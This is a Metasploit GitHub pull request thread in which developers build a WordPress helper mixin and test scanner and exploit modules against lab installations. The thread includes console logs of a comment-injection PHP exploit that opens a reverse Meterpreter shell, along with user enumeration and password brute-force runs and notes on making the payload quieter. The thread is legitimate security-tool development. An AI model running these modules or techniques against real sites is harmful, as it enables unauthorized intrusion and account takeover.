firefart commented 10 years ago

I created a Wordpress mixin to abstract some common wordpress methods. rspecs are not implemented since a mocking for rex sockets/http is needed. Regexes and logic taken from https://github.com/wpscanteam/wpscan

Changes

New Wordpress Module
The following modules were updated using the new module
- auxiliary/scanner/http/wordpress_login_enum.rb
- auxiliary/scanner/http/wordpress_pingback_access.rb
- exploit/unix/webapp/php_wordpress_total_cache.rb
New method path_from_uri in Msf::Exploit::Remote::HttpClient to parse an uri string and return only the path and query
New method peer in Msf::Exploit::Remote::HttpClient used by many exploits, but defined per module
Copy paste error in lib/msf/core/exploit/web.rb
Checks in the changed modules to see if the provided target is online and running wordpress
Updated the php payload in php_wordpress_total_cache.rb so there will be no error messages when the post is called via browser without the HTTP header set. This makes the exploit less noisy
Included a random text in the php payload in php_wordpress_total_cache.rb, to check if the comment was posted correctly
Updated php_wordpress_total_cache.rb to also work with moderated comments. Wordpress shows them only to the user who posted them (via a cookie). By setting this cookie, the payload can be executed even on moderated comments.
php_wordpress_total_cache.rb will now try to fetch all blog posts via the rss feed and only if that fails, a bruteforce based on postids is started
TODO:
[x] fix indentation
[x] Check which Wordpress Versions are supported by the module and document them
TODO after merge:
[ ] consistent naming on wordpress modules - move them into wordpress subdirectory
[ ] update the other wordpress modules to use the new mixin
[ ] add @CharlieEriksen methods from https://github.com/rapid7/metasploit-framework/pull/1301
[ ] remove self defined peer methods from various modules since it is now defined in HttpClient

limhoff-r7 commented 10 years ago

I'm not a big fan of using name prefixes for namespacing, but since this is a mixin, I don't think we can help it unless we change it to a proxy model. However, wp is way too short and opaque. I get that wordpress is more typing, but the wp_ prefix needs to be changed to wordpress_ so it's obvious where those methods are coming from.

limhoff-r7 commented 10 years ago

Maybe we should add wordpress as a directory in the module reference names instead of just being part of the base name. @todb-r7 what do you think?

todb commented 10 years ago

@limhoff-r7 how do you mean, like http/wordpress similar to how net/dns and net/ssh are organized? On Aug 21, 2013 10:13 AM, "Luke Imhoff" notifications@github.com wrote:

Maybe we should add wordpress as a directory in the module reference names instead of just being part of the base name. @todb-r7https://github.com/todb-r7what do you think?

— Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/2267#issuecomment-23019444 .

limhoff-r7 commented 10 years ago

@todb ya

todb commented 10 years ago

Sounds good to me. I can imagine future mixins where this would make sense, too. On Aug 21, 2013 11:02 AM, "Luke Imhoff" notifications@github.com wrote:

@todb https://github.com/todb ya

— Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/2267#issuecomment-23023246 .

firefart commented 10 years ago

Hi @todb and @limhoff-r7! Thanks for the feedback. I'm currently looking over implementing this mixin as a module like net/dns. My Problem here is, that i can not use Exploit::Remote::HttpClient because of the missing datastore. Any suggestions on this?

firefart commented 10 years ago

please forget about my last (now deleted) comments :D

firefart commented 10 years ago

Can't get my rpsecs working because i need some kind of web mocking for send_request_cgi. I tried it with the webmock gem but since metasploit uses Rex Sockets this does not work. Any hints on this @todb @limhoff-r7 ?

limhoff-r7 commented 10 years ago

I think you'd have to adapt webmock to work with Rex the way it works with other libraries: https://github.com/bblimke/webmock#supported-http-libraries. Awesome if you do it, but nothing we've attempted yet. You'd need to fork webmock and get them to accept the change or have us ship your fork for a bit using a :git reference in metasploit-framework's Gemfile.

firefart commented 10 years ago

Puh that sounds hard without knowing about the Rex Libraries. But if someone wants to implement the Rex HTTP Lib into webmock the rex http lib needs to be a seperate gem so it can be included in the webmock source right? I think for now it's better to drop the idea of rspecs for this pull request.

limhoff-r7 commented 10 years ago

The way webmock works is that it monkey patches/stubs the libraries it supports, but it would need access to rex to run its specs. metasploit-framework gemification is in the nebulous future cloud down the timeline.

firefart commented 10 years ago

Ok thx. Then i think this PR is ready for the final review. All of your feedback is implemented.

limhoff-r7 commented 10 years ago

I don't think the module should use HTTP as its top-level namespace since that put it outside the Msf or Metasploit::Framework namespace that metasploit-framework owns and then move to the appropriate directory to match the name change.

firefart commented 10 years ago

a sorry i thought it should be moved out like net/dns and net/ssh. What do you suggest? Maybe Msf::Modules::HTTP::Wordpress?

limhoff-r7 commented 10 years ago

A clarification:

It needs to be in Msf::HTTP::Wordpress and be in lib/msf/http/wordpress.rb and then the lib/msf/http/wordpress directory for the modules in Msf::HTTP::Wordpress::*.

OR

It needs to be in Metasploit::Framework::HTTP::Wordpress and be in in lib/metasploit/framework/http/wordpress.rb and then lib/metasploit/framework/http/wordpress directory for modules in Metasploit::Framework::HTTP::Wordpress::*.

Then they will match the activesupport naming conventions.

firefart commented 10 years ago

Ok thanks for clarification the modules are now moved to lib/msf/http/wordpress*

limhoff-r7 commented 10 years ago

Because you depend on Msf::Exploit::Remote::HttpClient, so you aren't an independent library. My understanding is that anything under lib that is not under msf is supposed to be considered independent/3rd-party and not dependent on Msf code.

limhoff-r7 commented 10 years ago

@todb-r7 am I right my summary of how stuff directly under lib is supposed to work?

jvazquez-r7 commented 10 years ago

@FireFart: thanks for the effort :). Tried to do a first code review, and write down my thoughts. Read my comments carefully, and since it's mixin code expect code review from others.

On the other hand, do you mind to share with us what versions of wordpress have you used for testing? Also if you know about what wordpress versions should work (or not) with this mixin/ API's. In the meanwhile I'm going to proceed with some wordpress installations and proceed with some testing. Will share thoughts.

Thanks!

jvazquez-r7 commented 10 years ago

First dumb test:

From master

msf exploit(php_wordpress_total_cache) > set RHOST 192.168.172.162
RHOST => 192.168.172.162
msf exploit(php_wordpress_total_cache) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.162:80 - Trying unauthenticated exploitation...
[*] 192.168.172.162:80 - Trying to brute force a valid POST ID...
[*] 192.168.172.162:80 - Using the brute forced POST ID 1...
[*] 192.168.172.162:80 - Injecting the PHP Code in a comment...
[*] 192.168.172.162:80 - Executing the payload...
[*] Sending stage (39195 bytes) to 192.168.172.162
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.162:35946) at 2013-08-23 09:57:03 -0500

^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.162 - Meterpreter session 1 closed.  Reason: User exit

From this pull request:

Juans-MacBook-Pro:metasploit-framework juan$ git checkout review-pr2267
Switched to branch 'review-pr2267'
Juans-MacBook-Pro:metasploit-framework juan$ ./msfconsole
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1159 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops

msf > use exploit/unix/webapp/php_wordpress_
use exploit/unix/webapp/php_wordpress_foxypress    use exploit/unix/webapp/php_wordpress_lastpost     use exploit/unix/webapp/php_wordpress_total_cache
msf > use exploit/unix/webapp/php_wordpress_total_cache 
msf exploit(php_wordpress_total_cache) > set rhost 192.168.172.162
rhost => 192.168.172.162
msf exploit(php_wordpress_total_cache) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[-] Exploit failed [no-target]: 192.168.172.162:80 does not seeem to be Wordpress site
msf exploit(php_wordpress_total_cache) >

:\ digging into it

jvazquez-r7 commented 10 years ago

First fail solved by adding a final "/" to the TARGETURI, exploit still not working:

msf exploit(php_wordpress_total_cache) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(php_wordpress_total_cache) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.162:80 - Trying unauthenticated exploitation...
[*] 192.168.172.162:80 - Trying to brute force a valid POST ID...
[*] 192.168.172.162:80 - Using the brute forced POST ID 1...
[*] 192.168.172.162:80 - Injecting the PHP Code in a comment...
[*] 192.168.172.162:80 - Executing the payload...

more debug in progress....

wchen-r7 commented 10 years ago

@jvazquez-r7 Yeah, that's because if you set the URI to "/wordpress", in the web world "wordpress" can be treated as a file, or a directory, you can't tell. So the rule is that when you don't have the slash at the end, your URI is actually being looked at as a file (but when you use normalize_uri and append something else to it, that function assumes it's a directory), if you have a slash at the end, it's looked at as a directory.

firefart commented 10 years ago

Thanks for the feedback! I'm currently implementing all your suggestions. @jvazquez-r7 Will do some investigation on the Wordpress Versions (added to todo list)

firefart commented 10 years ago

Hi @jvazquez-r7 and @wchen-r7, I implemented all your feedback and did a little bit of bugfixing.

firefart commented 10 years ago

PS: I updated the payload to get rid of the php error messages in comments. The used function array_key_exists is only available in PHP 4.0.7+. Is this a problem?

firefart commented 10 years ago

Nevermind i used another function instead

firefart commented 10 years ago

I just started a little project to simplify testing: https://github.com/FireFart/WordpressLabInstaller

This script will download and install all wordpress versions available (install.php script needs to be called manually on each installation). Hope i get this working to test the new wordpress modules against them and check for supported wordpress versions

jvazquez-r7 commented 10 years ago

@FireFart awesome, thanks! Will give a chance, I'm in the task of testing the modified modules and mixin these days, will give a chance to the attached project.

jvazquez-r7 commented 10 years ago

Recovering it...!

jvazquez-r7 commented 10 years ago

Loved it: https://github.com/FireFart/WordpressLabInstaller thanks @FireFart ! :)

jvazquez-r7 commented 10 years ago

Test results for modules/auxiliary/scanner/http/wordpress_login_enum

wordpress 2.0: user enumeration working, password check no working

msf auxiliary(wordpress_login_enum) > set USERNAME admin
USERNAME => admin
msf auxiliary(wordpress_login_enum) > set PASSWORD admin
PASSWORD => admin
msf auxiliary(wordpress_login_enum) > run

[*] /wordpress-2.0/ - WordPress Enumeration - Running User Enumeration
[*] /wordpress-2.0/ - WordPress Enumeration - Running User validation
[*] /wordpress-2.0/ - WordPress Enumeration - Checking Username:'admin'
[+] /wordpress-2.0/ - WordPress Enumeration- Username: 'admin' - is VALID
[+] /wordpress-2.0/ - WordPress Enumeration - Found 1 valid user
[*] /wordpress-2.0/ - WordPress Brute Force - Running Bruteforce
[*] /wordpress-2.0/ - WordPress Brute Force - Skipping all but 1 valid user
[*] /wordpress-2.0/ - WordPress Brute Force - Trying username:'admin' with password:''
[-] /wordpress-2.0/ - WordPress Brute Force - Failed to login as 'admin'
[*] /wordpress-2.0/ - WordPress Brute Force - Trying username:'admin' with password:'admin'
[-] /wordpress-2.0/ - WordPress Brute Force - Failed to login as 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

wordpress 2.5: user enumeration worked, password chech no:

[*] /wordpress-2.5/ - WordPress Enumeration - Running User Enumeration
[*] /wordpress-2.5/ - WordPress Enumeration - Running User validation
[*] /wordpress-2.5/ - WordPress Enumeration - Checking Username:'admin'
[+] /wordpress-2.5/ - WordPress Enumeration- Username: 'admin' - is VALID
[+] /wordpress-2.5/ - WordPress Enumeration - Found 1 valid user
[*] /wordpress-2.5/ - WordPress Brute Force - Running Bruteforce
[*] /wordpress-2.5/ - WordPress Brute Force - Skipping all but 1 valid user
[*] /wordpress-2.5/ - WordPress Brute Force - Trying username:'admin' with password:''
[-] /wordpress-2.5/ - WordPress Brute Force - Failed to login as 'admin'
[*] /wordpress-2.5/ - WordPress Brute Force - Trying username:'admin' with password:'admin'
[-] /wordpress-2.5/ - WordPress Brute Force - Failed to login as 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

wordpress 3.0: both user enumeration and password check worked:

rmsf auxiliary(wordpress_login_enum) > run

[*] /wordpress-3.0/ - WordPress Enumeration - Running User Enumeration
[*] /wordpress-3.0/ - WordPress Enumeration - Running User validation
[*] /wordpress-3.0/ - WordPress Enumeration - Checking Username:'admin'
[+] /wordpress-3.0/ - WordPress Enumeration- Username: 'admin' - is VALID
[+] /wordpress-3.0/ - WordPress Enumeration - Found 1 valid user
[*] /wordpress-3.0/ - WordPress Brute Force - Running Bruteforce
[*] /wordpress-3.0/ - WordPress Brute Force - Skipping all but 1 valid user
[*] /wordpress-3.0/ - WordPress Brute Force - Trying username:'admin' with password:''
[-] /wordpress-3.0/ - WordPress Brute Force - Failed to login as 'admin'
[*] /wordpress-3.0/ - WordPress Brute Force - Trying username:'admin' with password:'admin'
[+] /wordpress-3.0/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

wordpress 3.6: both enumeration and brute forcer worked, but tried to "Brute-forcing previously found accounts..." with a previously bruteforced password

msf auxiliary(wordpress_login_enum) > run

[*] /wordpress-3.6/ - WordPress Enumeration - Running User Enumeration
[+] /wordpress-3.6/ - Found user 'admin' with id 1
[*] /wordpress-3.6/ - Usernames stored in: /Users/juan/.msf4/loot/20130923155020_default_192.168.172.130_wordpress.users_136295.txt
[*] /wordpress-3.6/ - WordPress Enumeration - Running User validation
[*] /wordpress-3.6/ - WordPress Enumeration - Checking Username:'admin'
[+] /wordpress-3.6/ - WordPress Enumeration- Username: 'admin' - is VALID
[+] /wordpress-3.6/ - WordPress Enumeration - Found 1 valid user
[*] /wordpress-3.6/ - WordPress Brute Force - Running Bruteforce
[*] /wordpress-3.6/ - WordPress Brute Force - Skipping all but 1 valid user
[*] /wordpress-3.6/ - WordPress Brute Force - Trying username:'admin' with password:''
[-] /wordpress-3.6/ - WordPress Brute Force - Failed to login as 'admin'
[*] /wordpress-3.6/ - WordPress Brute Force - Trying username:'admin' with password:'admin'
[+] /wordpress-3.6/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin'
[*] /wordpress-3.6/ - Brute-forcing previously found accounts...
[*] /wordpress-3.6/ - WordPress Brute Force - Trying username:'admin' with password:'admin'
[+] /wordpress-3.6/ - WordPress Brute Force - SUCCESSFUL login for 'admin' : 'admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

About this module:

Support for wordpress 2.* would worth.
Check what is happening on the 3.6 version would worth.

jvazquez-r7 commented 10 years ago

Tests results for modules/auxiliary/scanner/http/wordpress_pingback_access.rb:

Looks like working ok

msf auxiliary(wordpress_pingback_access) > set targeturi /wordpress-3.0/
targeturi => /wordpress-3.0/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-3.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set targeturi /wordpress-2.5/
targeturi => /wordpress-2.5/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-2.5
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set targeturi /wordpress-2.0/
targeturi => /wordpress-2.0/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-2.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

firefart commented 10 years ago

thx for the feedback! currently looking into fixing the login on older installations.

jvazquez-r7 commented 10 years ago

thanks @FireFart, on my side, I'm coding a test module, to make an easy testing of the different API's available through the mixin. Hope to post results tomorrow :) Will run on several versions of wordpress and put here results and test module :)

Thanks for keep working on it!

juan

firefart commented 10 years ago

Wordpress login should now also work with 2.0 and 2.5. Had to adopt the get_cookies method because it only returned the first cookie, in the case of more than one cookie this caused the scanner to fail (first cookie is the wordpress_test_cookie)

firefart commented 10 years ago

BTW: User enumeration on 2,0 and 2,5 is not working. Only the validation is working.

firefart commented 10 years ago

User enumeration is not working because the username is not present in the ?author=1 and authorfeed urls (the urls are working)

jvazquez-r7 commented 10 years ago

@FireFart I'm going to continue with testing, but, please, if the mixin is currently under development, just add a warning, so it can be tested once it's done :) (said because I see just new API's in the last hours :))

firefart commented 10 years ago

Sorry i added the new API during my own tests. But the mixin should now be finished. Am 24.09.2013 16:01 schrieb "Juan Vazquez" notifications@github.com:

@FireFart https://github.com/FireFart I'm going to continue with testing, but, please, if the mixin is currently under development, just add a warning, so it can be tested once it's done :) (said because I see just new API's in the last hours :))

— Reply to this email directly or view it on GitHubhttps://github.com/rapid7/metasploit-framework/pull/2267#issuecomment-25005793 .

jvazquez-r7 commented 10 years ago

Thanks @FireFart ,

I'm using this module for testing the mixin API's: https://gist.github.com/jvazquez-r7/6686432

At the moment I've spotted two things:

User enumeration not working, looks like @FireFart is aware of it :S but really the API doesn't look like giving the expected answer so digging into it just to understand the issue :)
Comment as unonymous user, looks like isn't working, need to dig into it. Looking into it just now.
Wordpres 2.0

msf auxiliary(wordpress_mixin_test) > rexploit
[*] Reloading module...

[*] Is wordpress online...
[+] Wordpress and online!
[*] Finding wordpress version...
[+] Version found: 2.0
[*] Generating URLs...
[*] URL Login: /wordpress-2.0/wp-login.php
[*] URL Post 3: /wordpress-2.0/?p=3
[*] URL Author 1: /wordpress-2.0/?author=1
[*] URL RSS: /wordpress-2.0/?feed=rss2
[*] URL RDF: /wordpress-2.0/feed/rdf/
[*] URL ATOM: /wordpress-2.0/feed/atom/
[*] URL Readme: /wordpress-2.0/readme.html
[*] URL Sitemap: /wordpress-2.0/sitemap.xml
[*] URL OPML: /wordpress-2.0/wp-links-opml.php
[*] Login on wordpress...
[+] Logged in okey: wordpressuser_57b8b9d9751682d00894b06a4ecc62f7=admin; wordpresspass_57b8b9d9751682d00894b06a4ecc62f7=c3284d0f94606de1fd2af172aba15bf3;
[*] Testing if wordpress_user_exists?...
[+] user 'admin' exists... Ok
[+] user 'nonexistent' no exists... Ok
[*] Testing if wordpress_userid_exists?...
[!] user_id 0 doesn't exist
[!] user_id 1 doesn't exist
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist
[*] Finding a valid post id (anonymous)
[+] Post id found: 0
[*] Finding a valid post id (authenticated)
[+] Post id found: 0
[*] Testing if comments are enabled on id 0
[-] Comments not enabled 0
[*] Testing if comments are enabled on url: /wordpress-2.0/?p=0
[-] Comments not enabled /wordpress-2.0/?p=0
[*] Finding a valid post id with comments enabled (anonymous)
[+] Post id found: 1
[*] Finding a valid post id with comments enabled (authenticated)
[+] Post id found: 1
[*] Testing if comments are enabled on id 1
[+] Comments enabled (1
[*] Testing if comments are enabled on url: /wordpress-2.0/?p=1
[+] Comments enabled (/wordpress-2.0/?p=1
[*] Posts a comment as an authenticated user...
[+] Comment ok: /wordpress-2.0/?p=1
[*] Post unauthenticated comment
[-] 192.168.172.130:80 - Post comment failed. Status Code: 200
[-] Couldn't post comment
[*] Cookie to show moderated comments comment_author_57b8b9d9751682d00894b06a4ecc62f7=juan; comment_author_email_57b8b9d9751682d00894b06a4ecc62f7=juan@noemail.com; comment_author_url_57b8b9d9751682d00894b06a4ecc62f7=http://nourl.com;
[*] Get all blogs via feed
[+] Posts found via feed:
[*] /wordpress-2.0
[*] /wordpress-2.0/?p=1
[*] Auxiliary module execution completed

Wordpress 2.5

msf auxiliary(wordpress_mixin_test) > set TARGETURI /wordpress-2.5/
TARGETURI => /wordpress-2.5/
msf auxiliary(wordpress_mixin_test) > rexploit
[*] Reloading module...

[*] Is wordpress online...
[+] Wordpress and online!
[*] Finding wordpress version...
[+] Version found: 2.5
[*] Generating URLs...
[*] URL Login: /wordpress-2.5/wp-login.php
[*] URL Post 3: /wordpress-2.5/?p=3
[*] URL Author 1: /wordpress-2.5/?author=1
[*] URL RSS: /wordpress-2.5/?feed=rss2
[*] URL RDF: /wordpress-2.5/feed/rdf/
[*] URL ATOM: /wordpress-2.5/feed/atom/
[*] URL Readme: /wordpress-2.5/readme.html
[*] URL Sitemap: /wordpress-2.5/sitemap.xml
[*] URL OPML: /wordpress-2.5/wp-links-opml.php
[*] Login on wordpress...
[+] Logged in okey: wordpress_820eaa40baae17891260783c539f068f=admin%7C1380209345%7Cd521f2b510d0b9825d2f414b82c34b19;
[*] Testing if wordpress_user_exists?...
[+] user 'admin' exists... Ok
[+] user 'nonexistent' no exists... Ok
[*] Testing if wordpress_userid_exists?...
[!] user_id 0 doesn't exist
[!] user_id 1 doesn't exist
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist
[*] Finding a valid post id (anonymous)
[+] Post id found: 0
[*] Finding a valid post id (authenticated)
[+] Post id found: 0
[*] Testing if comments are enabled on id 0
[-] Comments not enabled 0
[*] Testing if comments are enabled on url: /wordpress-2.5/?p=0
[-] Comments not enabled /wordpress-2.5/?p=0
[*] Finding a valid post id with comments enabled (anonymous)
[+] Post id found: 1
[*] Finding a valid post id with comments enabled (authenticated)
[+] Post id found: 1
[*] Testing if comments are enabled on id 1
[+] Comments enabled (1
[*] Testing if comments are enabled on url: /wordpress-2.5/?p=1
[+] Comments enabled (/wordpress-2.5/?p=1
[*] Posts a comment as an authenticated user...
[+] Comment ok: /wordpress-2.5/?p=1
[*] Post unauthenticated comment
[-] 192.168.172.130:80 - Post comment failed. Status Code: 500
[-] Couldn't post comment
[*] Cookie to show moderated comments comment_author_820eaa40baae17891260783c539f068f=juan; comment_author_email_820eaa40baae17891260783c539f068f=juan@noemail.com; comment_author_url_820eaa40baae17891260783c539f068f=http://nourl.com;
[*] Get all blogs via feed
[+] Posts found via feed:
[*] /wordpress-2.5
[*] /wordpress-2.5/?p=1
[*] Auxiliary module execution completed

Wordpress 3.0

msf auxiliary(wordpress_mixin_test) > rexploit
[*] Reloading module...

[*] Is wordpress online...
[+] Wordpress and online!
[*] Finding wordpress version...
[+] Version found: 3.0
[*] Generating URLs...
[*] URL Login: /wordpress-3.0/wp-login.php
[*] URL Post 3: /wordpress-3.0/?p=3
[*] URL Author 1: /wordpress-3.0/?author=1
[*] URL RSS: /wordpress-3.0/?feed=rss2
[*] URL RDF: /wordpress-3.0/feed/rdf/
[*] URL ATOM: /wordpress-3.0/feed/atom/
[*] URL Readme: /wordpress-3.0/readme.html
[*] URL Sitemap: /wordpress-3.0/sitemap.xml
[*] URL OPML: /wordpress-3.0/wp-links-opml.php
[*] Login on wordpress...
[+] Logged in okey: wordpress_logged_in_d939401b170a18295eeef3d66217955f=admin%7C1380208646%7Cabe93902c3477d51537694bdaa673e58;
[*] Testing if wordpress_user_exists?...
[+] user 'admin' exists... Ok
[+] user 'nonexistent' no exists... Ok
[*] Testing if wordpress_userid_exists?...
[!] user_id 0 doesn't exist
[!] user_id 1 doesn't exist
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist
[*] Finding a valid post id (anonymous)
[+] Post id found: 0
[*] Finding a valid post id (authenticated)
[+] Post id found: 0
[*] Testing if comments are enabled on id 0
[-] Comments not enabled 0
[*] Testing if comments are enabled on url: /wordpress-3.0/?p=0
[-] Comments not enabled /wordpress-3.0/?p=0
[*] Finding a valid post id with comments enabled (anonymous)
[+] Post id found: 1
[*] Finding a valid post id with comments enabled (authenticated)
[+] Post id found: 1
[*] Testing if comments are enabled on id 1
[+] Comments enabled (1
[*] Testing if comments are enabled on url: /wordpress-3.0/?p=1
[+] Comments enabled (/wordpress-3.0/?p=1
[*] Posts a comment as an authenticated user...
[+] Comment ok: /wordpress-3.0/?p=1
[*] Post unauthenticated comment
[-] 192.168.172.130:80 - Post comment failed. Status Code: 403
[-] Couldn't post comment
[*] Cookie to show moderated comments comment_author_d939401b170a18295eeef3d66217955f=juan; comment_author_email_d939401b170a18295eeef3d66217955f=juan@noemail.com; comment_author_url_d939401b170a18295eeef3d66217955f=http://nourl.com;
[*] Get all blogs via feed
[+] Posts found via feed:
[*] /wordpress-3.0
[*] /wordpress-3.0/?p=1
[*] Auxiliary module execution completed

Wordpress 3.6

msf auxiliary(wordpress_mixin_test) > rexploit
[*] Reloading module...

[*] Is wordpress online...
[+] Wordpress and online!
[*] Finding wordpress version...
[+] Version found: 3.6
[*] Generating URLs...
[*] URL Login: /wordpress-3.6/wp-login.php
[*] URL Post 3: /wordpress-3.6/?p=3
[*] URL Author 1: /wordpress-3.6/?author=1
[*] URL RSS: /wordpress-3.6/?feed=rss2
[*] URL RDF: /wordpress-3.6/feed/rdf/
[*] URL ATOM: /wordpress-3.6/feed/atom/
[*] URL Readme: /wordpress-3.6/readme.html
[*] URL Sitemap: /wordpress-3.6/sitemap.xml
[*] URL OPML: /wordpress-3.6/wp-links-opml.php
[*] Login on wordpress...
[+] Logged in okey: wordpress_logged_in_96c22ad405b213e1ad579099d91648d5=admin%7C1380208604%7Cc72612538b25e28533d332dc4d85bec3;
[*] Testing if wordpress_user_exists?...
[+] user 'admin' exists... Ok
[+] user 'nonexistent' no exists... Ok
[*] Testing if wordpress_userid_exists?...
[+] user_id 0 exists
[+] user_id 1 exists
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist
[*] Finding a valid post id (anonymous)
[+] Post id found: 0
[*] Finding a valid post id (authenticated)
[+] Post id found: 0
[*] Testing if comments are enabled on id 0
[-] Comments not enabled 0
[*] Testing if comments are enabled on url: /wordpress-3.6/?p=0
[-] Comments not enabled /wordpress-3.6/?p=0
[*] Finding a valid post id with comments enabled (anonymous)
[+] Post id found: 1
[*] Finding a valid post id with comments enabled (authenticated)
[+] Post id found: 1
[*] Testing if comments are enabled on id 1
[+] Comments enabled (1
[*] Testing if comments are enabled on url: /wordpress-3.6/?p=1
[+] Comments enabled (/wordpress-3.6/?p=1
[*] Posts a comment as an authenticated user...
[+] Comment ok: /wordpress-3.6/?p=1
[*] Post unauthenticated comment
[-] 192.168.172.130:80 - Post comment failed. Status Code: 403
[-] Couldn't post comment
[*] Cookie to show moderated comments comment_author_96c22ad405b213e1ad579099d91648d5=juan; comment_author_email_96c22ad405b213e1ad579099d91648d5=juan@noemail.com; comment_author_url_96c22ad405b213e1ad579099d91648d5=http://nourl.com;
[*] Get all blogs via feed
[+] Posts found via feed:
[*] /wordpress-3.6
[*] /wordpress-3.6/?p=1
[*] Auxiliary module execution completed

jvazquez-r7 commented 10 years ago

Maybe I've just spotted why wordpress is restricting my anonymous comments:

.<p>You are posting comments too quickly.  Slow down.</p></body>

:P doing an sleep and retrying....

jvazquez-r7 commented 10 years ago

Yeah, posting of unauthenticated comments is working:

[*] Testing if comments are enabled on id 1
[+] Comments enabled (1
[*] Testing if comments are enabled on url: /wordpress-2.5/?p=1
[+] Comments enabled (/wordpress-2.5/?p=1
[*] Post unauthenticated comment
[+] Comment ok: /wordpress-2.5/?p=1
[*] Cookie to show moderated comments comment_author_820eaa40baae17891260783c539f068f=juan; comment_author_email_820eaa40baae17891260783c539f068f=juan@noemail.com; comment_author_url_820eaa40baae17891260783c539f068f=http://nourl.com;

jvazquez-r7 commented 10 years ago

Tested again, indeed now it's working for wordpress-2.0 and wordpress-2.5 but generates a false positive for user with id=0 on wordpress 3.0 and 3.5:

wordpress 2.0 and wordpress 2.5

[*] Testing if wordpress_userid_exists?...
[!] user_id 0 doesn't exist
[+] user_id 1 exists
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist

wordpress 3.0

[*] Testing if wordpress_userid_exists?...
[+] user_id 0 exists
[+] user_id 1 exists
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist

*wordpress 3.6

[*] Testing if wordpress_userid_exists?...
[+] user_id 0 exists
[+] user_id 1 exists
[!] user_id 2 doesn't exist
[!] user_id 3 doesn't exist
[!] user_id 4 doesn't exist
[!] user_id 5 doesn't exist
[!] user_id 6 doesn't exist
[!] user_id 7 doesn't exist
[!] user_id 8 doesn't exist
[!] user_id 9 doesn't exist
[!] user_id 10 doesn't exist

Checked on the databases, really there isn't a user_id = 0:

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email           | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BJ/F0Ye1PYQSBYCB1JIa/6o9V6YVDx/ | admin         | juan[at]metasploit.com |          | 2013-09-23 20:43:05 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+----------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.00 sec)

firefart commented 10 years ago

lol i just checked it and it seems wordpress returns all posts from all authors when calling ?author=0 should i implement a test in wordpress_userid_exists? that checks for a value greater than zero? any other ideas?

firefart commented 10 years ago

should be fixed

jvazquez-r7 commented 10 years ago

I must to say I'm not in love with the last commit, but okey :P

jvazquez-r7 commented 10 years ago

After the last commit:

msf auxiliary(wordpress_login_enum) > run

